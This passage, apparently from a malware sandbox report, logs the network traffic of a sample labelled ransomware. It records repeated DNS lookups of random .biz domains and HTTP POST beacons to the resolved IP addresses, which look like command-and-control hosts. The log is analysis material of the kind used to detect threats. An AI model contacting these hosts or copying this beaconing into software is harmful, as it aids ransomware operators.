User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=105086560b0682f15ebaad4ce6069036|191.101.209.39|1717923865|1717923865|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://oflybfv.biz/diynarecblkgkv

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.200.43.61:80

Request

POST /diynarecblkgkv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7625c60b32239f22027de17fe62564e3|191.101.209.39|1717923865|1717923865|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yhqqc.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

yhqqc.biz

IN A

Response

yhqqc.biz

IN A

34.211.97.45
POST

http://yhqqc.biz/dkpksqhgfvviycx

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /dkpksqhgfvviycx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cb31869a1b88841cdc02cfb9be30003b|191.101.209.39|1717923865|1717923865|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yunalwv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

yunalwv.biz

IN A

Response

yunalwv.biz

IN A

208.100.26.245
DNS

185.94.254.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

185.94.254.3.in-addr.arpa

IN PTR

Response

185.94.254.3.in-addr.arpa

IN PTR

ec2-3-254-94-185 eu-west-1compute amazonawscom
DNS

140.228.214.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.228.214.85.in-addr.arpa

IN PTR

Response

140.228.214.85.in-addr.arpa

IN PTR

h2758763stratoservernet
DNS

140.228.214.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.228.214.85.in-addr.arpa

IN PTR

Response

140.228.214.85.in-addr.arpa

IN PTR

h2758763stratoservernet
DNS

jpskm.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jpskm.biz

IN A

Response

jpskm.biz

IN A

34.211.97.45
DNS

jpskm.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jpskm.biz

IN A

Response

jpskm.biz

IN A

34.211.97.45
DNS

mnjmhp.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mnjmhp.biz

IN A

Response

mnjmhp.biz

IN A

44.200.43.61
DNS

mnjmhp.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mnjmhp.biz

IN A

Response

mnjmhp.biz

IN A

44.200.43.61
POST

http://mnjmhp.biz/uktdloeyeuw

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.200.43.61:80

Request

POST /uktdloeyeuw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=57a33dffad4e63e123accc40e86eda6a|191.101.209.39|1717923866|1717923866|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://jpskm.biz/qtsasvnnwkmpcitg

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.211.97.45:80

Request

POST /qtsasvnnwkmpcitg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=29053d30f70f74a32a31c1cfa0baaa57|191.101.209.39|1717923866|1717923866|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

opowhhece.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

opowhhece.biz

IN A

Response

opowhhece.biz

IN A

18.208.156.248
POST

http://opowhhece.biz/lwogmha

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.208.156.248:80

Request

POST /lwogmha HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=49a592cb4911b7884da5e5e6429e9d7e|191.101.209.39|1717923866|1717923866|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

zjbpaao.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

zjbpaao.biz

IN A

Response
DNS

jdhhbs.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jdhhbs.biz

IN A

Response

jdhhbs.biz

IN A

13.251.16.150
POST

http://jdhhbs.biz/bydyptt

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

13.251.16.150:80

Request

POST /bydyptt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e5eddf1d22d8a1e18d0e079226a45468|191.101.209.39|1717923867|1717923867|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

lrxdmhrr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

lrxdmhrr.biz

IN A

Response

lrxdmhrr.biz

IN A

54.244.188.177
POST

http://lrxdmhrr.biz/vhuvvbcimdcq

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /vhuvvbcimdcq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d0c695a429449dc57bac85e61917f134|191.101.209.39|1717923866|1717923866|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

248.156.208.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

248.156.208.18.in-addr.arpa

IN PTR

Response

248.156.208.18.in-addr.arpa

IN PTR

ec2-18-208-156-248 compute-1 amazonawscom
DNS

wllvnzb.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

wllvnzb.biz

IN A

Response

wllvnzb.biz

IN A

18.141.10.107
DNS

wllvnzb.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

wllvnzb.biz

IN A

Response

wllvnzb.biz

IN A

18.141.10.107
POST

http://wllvnzb.biz/nogooyab

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /nogooyab HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=af8c038d80de5472fac683eaef935a78|191.101.209.39|1717923867|1717923867|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mgmsclkyu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

mgmsclkyu.biz

IN A

Response

mgmsclkyu.biz

IN A

34.246.200.160
POST

http://mgmsclkyu.biz/pktmwgvm

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.246.200.160:80

Request

POST /pktmwgvm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=45f93748309cb558a16d96861a139101|191.101.209.39|1717923867|1717923867|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

warkcdu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

warkcdu.biz

IN A

Response

warkcdu.biz

IN A

18.141.10.107
DNS

warkcdu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

warkcdu.biz

IN A

Response

warkcdu.biz

IN A

18.141.10.107
POST

http://warkcdu.biz/pfljpexr

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /pfljpexr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=45301cf57a04bae363a325e4f39803f0|191.101.209.39|1717923868|1717923868|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gnqgo.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gnqgo.biz

IN A

Response

gnqgo.biz

IN A

54.80.154.23
POST

http://gnqgo.biz/iprryxanoiwyt

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.80.154.23:80

Request

POST /iprryxanoiwyt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ea731c2f3ef98b746a9a2b9c55154636|191.101.209.39|1717923868|1717923868|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jhvzpcfg.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jhvzpcfg.biz

IN A

Response

jhvzpcfg.biz

IN A

3.237.86.197
POST

http://jhvzpcfg.biz/nikqkptv

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.237.86.197:80

Request

POST /nikqkptv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=393c24d7222eb63d40fb19d9b2299f91|191.101.209.39|1717923868|1717923868|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

acwjcqqv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

acwjcqqv.biz

IN A

Response

acwjcqqv.biz

IN A

18.141.10.107
DNS

lpuegx.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
DNS

lpuegx.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
POST

http://acwjcqqv.biz/bfgxeiyubdkaklo

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /bfgxeiyubdkaklo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=dc977968943dd0b0ba63f218b1fef88d|191.101.209.39|1717923869|1717923869|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gcedd.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gcedd.biz

IN A

Response

gcedd.biz

IN A

13.251.16.150
DNS

gcedd.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gcedd.biz

IN A

Response

gcedd.biz

IN A

13.251.16.150
POST

http://gcedd.biz/smjxwgwfacke

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

13.251.16.150:80

Request

POST /smjxwgwfacke HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a107f5f6b95c7ee8482e8d7af68f060e|191.101.209.39|1717923869|1717923869|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

lejtdj.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

lejtdj.biz

IN A

Response
DNS

vyome.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vyome.biz

IN A

Response

vyome.biz

IN A

44.213.104.86
DNS

vyome.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vyome.biz

IN A

Response

vyome.biz

IN A

44.213.104.86
POST

http://vyome.biz/qvpwuopvx

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.213.104.86:80

Request

POST /qvpwuopvx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7be9bec9d8019211f7c9d84a7df99dba|191.101.209.39|1717923869|1717923869|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yauexmxk.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

yauexmxk.biz

IN A

Response

yauexmxk.biz

IN A

54.80.154.23
DNS

yauexmxk.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

yauexmxk.biz

IN A

Response

yauexmxk.biz

IN A

54.80.154.23
POST

http://yauexmxk.biz/mygqtubwufdjog

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.80.154.23:80

Request

POST /mygqtubwufdjog HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2f3aa9ed2141692909f7eccdf128af6a|191.101.209.39|1717923870|1717923870|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jwkoeoqns.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jwkoeoqns.biz

IN A

Response

jwkoeoqns.biz

IN A

18.208.156.248
DNS

jwkoeoqns.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jwkoeoqns.biz

IN A

Response

jwkoeoqns.biz

IN A

18.208.156.248
DNS

iuzpxe.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

iuzpxe.biz

IN A

Response

iuzpxe.biz

IN A

13.251.16.150
DNS

iuzpxe.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

iuzpxe.biz

IN A

Response

iuzpxe.biz

IN A

13.251.16.150
POST

http://jwkoeoqns.biz/idbwn

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.208.156.248:80

Request

POST /idbwn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e5dd1acd2686bb9ebe463f9be58d83a2|191.101.209.39|1717923870|1717923870|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://iuzpxe.biz/ntpfmbdbyvpldea

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /ntpfmbdbyvpldea HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5e1dd04ed502b22e1733e7afc53864ee|191.101.209.39|1717923870|1717923870|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xccjj.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xccjj.biz

IN A

Response

xccjj.biz

IN A

44.213.104.86
POST

http://xccjj.biz/vaweoxamxqsk

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.213.104.86:80

Request

POST /vaweoxamxqsk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d322670dfd8492b29c9a810f512e76ad|191.101.209.39|1717923870|1717923870|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hehckyov.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

hehckyov.biz

IN A

Response

hehckyov.biz

IN A

44.221.84.105
POST

http://hehckyov.biz/bspwawm

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.221.84.105:80

Request

POST /bspwawm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f8bec48509fd31ab5009db683d9a19ba|191.101.209.39|1717923870|1717923870|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

